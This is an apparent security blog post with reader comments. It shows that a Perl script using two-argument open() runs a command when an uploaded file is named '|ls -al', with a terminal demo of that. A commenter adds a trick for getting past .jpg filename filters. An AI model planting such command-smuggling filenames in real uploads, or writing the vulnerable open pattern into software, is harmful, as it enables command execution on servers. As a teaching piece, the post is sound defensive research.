Cenzic 232 Patent
Paid Advertising
web application security lab

Code Execution Through Filenames in Uploads

I was up well before I should have been this morning and I was thinking more about file uploads. Remember back in the day when you inadvertently named a file with a dash or a slash in it? Oh, the joys of trying to clean up files on *Nix systems that had a slash in them. We learned our lesson and moved on with life. Now we are all grown and have a different reason to create files with bad chars in them. This time we want to exploit a file upload. So I created a script that simply look for and opened a file for reading in Perl:

#!/usr/bin/perl

opendir(DIR, ".") || die "Can't open dir: $!\n";
@files = grep { /ls/ && -f "./$_" } readdir(DIR);
foreach $file (@files) {
  open (FILE, "$file");  
  print while (<FILE>);
  close FILE;
}
closedir DIR;

Now here is me showing what is inside the file I named “|ls -al”, then showing what is inside the directory, and lastly, running the code:

[haX0r]$ cat \|ls\ -al
This information is within the file |ls -al
[haX0r]$ ls -al
total 08
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r–r– 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r–r– 1 haX0r haX0r 0 Jun 19 15:43 |ls -al
[haX0r]$ perl test.pl
[haX0r]$ total 14
drwxr-xr-x 2 haX0r haX0r 512 Jun 19 15:43 .
drwxr-xr-x 37 haX0r haX0r 4096 Jun 18 12:59 ..
-rw-r–r– 1 haX0r haX0r 247 Jun 19 15:46 test.pl
-rw-r–r– 1 haX0r haX0r 0 Jun 19 15:43 |ls -al

Immediately after running the program it ran the filename instead of opening the file. So herein lies another interesting place to use that arbitrary image name creation program I built (I guess it’s not just for XSS afterall - but actual code execution on the host machine). Here would be an example. Encoding spaces might cause problems but I’m sure we can work around that in most cases. Pretty trivial and pretty nasty.

13 Responses to “Code Execution Through Filenames in Uploads”

  1. Orwell, George Says:

    This is a well known ‘bug’. In fact, `perldoc -f open` has a warning about this. open(FILE, “

  2. Mrgat0x Says:

    Hmm, it’s very interesant but i not understand when “[haX0r]$ cat \|ls\ -al”, the query executed is part of perl?,

    Regards,

  3. RSnake Says:

    @George - you need to encode < to be &lt; for it to show up. Yes it is well known that perl has that issue however I’ve never heard about it in quite this way, but I don’t think most people think about it - especially in this case.

    @Mrgat0x - I’m not sure I understand your question.

  4. Chris Shiflett Says:

    “@George - you need to encode < to be &lt;”

    Should you be doing that? :-)

  5. Orwell, George Says:

    Personally, I always use the 3 part form in all scripts, even one-liners. I’ve always thought this was common practice, but maybe not… I’m disgusted with anyone who doesn’t use it in real applications… Then again, I’m sure some people do…

    Cheers,
    Mr. Orwell

  6. Steve Says:

    Will that do the same in PHP?

  7. RSnake Says:

    @Chris - you can thank the legacy wordpress codebase for that, maybe I’ll add it to my long list of things I need to modify.

  8. yawnmoth Says:

    @Steve - why not test it out and find out for yourself?

  9. hackathology Says:

    interesting, interesting……..

  10. [fazed] Says:

    and if you need to call it a .jpg for the filters try something like:
    ls>a#.jpg
    then to read the output of the command:
    cat<a>

  11. [fazed] Says:

    huh why has only half of what i said been shown?

  12. RSnake Says:

    You didn’t change < to &gt;

  13. Villager 14 Says:

    [fazed]: Mr. Orwell’s comments and RSnake’s reply weren’t enough for you to learn that < and > (}:-]) are special?